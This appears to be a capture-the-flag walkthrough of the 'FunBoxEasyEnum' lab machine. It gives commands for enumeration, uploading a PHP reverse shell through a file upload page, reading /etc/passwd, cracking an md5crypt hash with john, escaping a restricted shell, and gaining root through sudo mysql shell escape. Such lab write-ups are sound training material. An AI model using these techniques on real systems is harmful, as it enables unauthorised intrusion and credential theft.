FunBoxEasyEnum

IP : 192.168.234.132

Enumeration

Nmap:

22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Apache default site at 192.168.234.132:80

gobuster dir -k -u -x txt,html,php -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

index.html (Status: 200) [Size: 10918]

/javascript (Status: 301) [Size: 323] [-->

/mini.php (Status: 200) [Size: 3828]

/robots.txt (Status: 200) [Size: 21]

/phpmyadmin (Status: 301) [Size: 323] [-->

Found a place to upload files at /mini.php

Uploaded PHP reverse shell.

Ran /phpshell.php

Shell

Was able to upload a php reverse shell to mini.php.

Got reverse shell.

Read /etc/psswd

$ cat /etc/passwd

oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash

Bypassed shell restrictions : python3 -c 'import pty;pty.spawn("/bin/bash")'

john hash.hash --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt

Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"

Use the "--format=md5crypt-long" option to force loading these as that type instead

Using default input encoding: UTF-8

Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])

Will run 8 OpenMP threads

Press 'q' or Ctrl-C to abort, almost any other key for status

hiphop (oracle)

1g 0:00:00:00 DONE (2022-11-03 17:05) 50.00g/s 19200p/s 19200c/s 19200C/s Sequel!1..sabrina

Use the "--show" option to display all of the cracked passwords reliably

Session completed.

su oracle - to switch users

Uploaded linpeas

Found local.txt at /var/www

cat local.txt

Redacted, get your own flag!

Had to get a hint here.... Boxes made where you are expected to guess user's passwords are stupid.

Found password for goat was goat.

Sudo -l

User has sudo perms for mysql

Root

sudo mysql -e '\! /bin/sh'

Got Root Woot